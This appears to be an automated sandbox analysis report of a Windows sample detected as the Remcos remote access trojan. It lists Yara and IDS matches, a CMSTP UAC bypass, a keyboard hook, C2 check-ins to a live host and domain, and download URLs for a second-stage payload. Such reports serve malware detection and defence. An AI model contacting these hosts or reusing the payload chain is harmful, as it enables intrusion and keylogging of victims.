Windows Analysis Report
pPLwX9wSrD.exe

AI detected suspicious sample

Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 7884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 8076, type: MEMORYSTR

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: dzocgvabs.exe, 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_75f159bd-4

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 7884, type: MEMORYSTR

Source: pPLwX9wSrD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.193.17:443 -> 192.168.2.7:49770 version: TLS 1.2

Source:	Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdb source: pPLwX9wSrD.exe
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.3258013197.000000000A390000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007918000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008D23000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3255208484.00000000071E0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.000000000894C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.3258013197.000000000A390000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007918000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008D23000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Rohan_SVN\Source\Server\RunRelease\DBServerT.pdbP2N source: pPLwX9wSrD.exe
Source:	Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3255208484.00000000071E0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.000000000894C000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:49851 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:49876 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:49883 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:49929 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:49899 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:49955 -> 181.131.217.244:1842
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:1842 -> 192.168.2.7:49955
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.7:49919 -> 181.131.217.244:1842

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: newstaticfreepoint24.ddns-ip.net

Source: global traffic

TCP traffic: 192.168.2.7:49758 -> 181.131.217.244:30203

Source: global traffic	HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacupf41tUXUKIvQwULtF4tmDv7359nQosi0CBcA%2F4VOm6lqogmU0NyZY9bZyJ4%2BwRjnbrHuOJtTOOxuSqcBPZRUcYiqA%2FuQ%3D%3D&Expires=1734023353 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 181.131.217.244 181.131.217.244
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49962 -> 178.237.33.50:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacupf41tUXUKIvQwULtF4tmDv7359nQosi0CBcA%2F4VOm6lqogmU0NyZY9bZyJ4%2BwRjnbrHuOJtTOOxuSqcBPZRUcYiqA%2FuQ%3D%3D&Expires=1734023353 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: navegacionseguracol24vip.org
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: newstaticfreepoint24.ddns-ip.net
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: csc.exe, 00000003.00000002.3256041816.00000000079E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D88000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D88000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/
Source: dzocgvabs.exe, 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: dzocgvabs.exe, 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D62000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D6D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpL
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D99000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D88000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpR
Source: dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D62000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D6D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: dzocgvabs.exe, 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpp
Source: csc.exe, 00000003.00000002.3256041816.00000000079E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
Source: csc.exe, 00000003.00000002.3256041816.0000000007A55000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pPLwX9wSrD.exe	String found in binary or memory: http://www.geomind.co.kr/
Source: pPLwX9wSrD.exe	String found in binary or memory: http://www.geomind.co.kr/Online
Source: csc.exe, 00000003.00000003.1794277108.0000000008E90000.00000004.00000800.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2057015971.000000000F63E000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000000.1792904857.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.4.dr	String found in binary or memory: http://www.hdsentinel.com
Source: csc.exe, 00000003.00000003.1794277108.0000000008E90000.00000004.00000800.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2057015971.000000000F63E000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000000.1792904857.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.4.dr	String found in binary or memory: http://www.hdsentinel.com/sendreport.phpU
Source: csc.exe, 00000003.00000003.1794277108.0000000008E90000.00000004.00000800.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2057015971.000000000F63E000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000000.1792904857.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.4.dr	String found in binary or memory: http://www.hdsentinel.comU
Source: HardDiskSentinelBin.exe.4.dr	String found in binary or memory: http://www.indyproject.org/
Source: csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007769000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
Source: csc.exe, 00000003.00000002.3256041816.0000000007997000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: csc.exe, 00000003.00000002.3256041816.0000000007918000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
Source: csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443

Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.193.17:443 -> 192.168.2.7:49770 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\dzocgvabs.exe

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_00411810 GetAsyncKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowTextA,SetWindowTextA,CallWindowProcA,

0_2_00411810

Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 7884, type: MEMORYSTR

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 7884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 8076, type: MEMORYSTR

System Summary

Source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
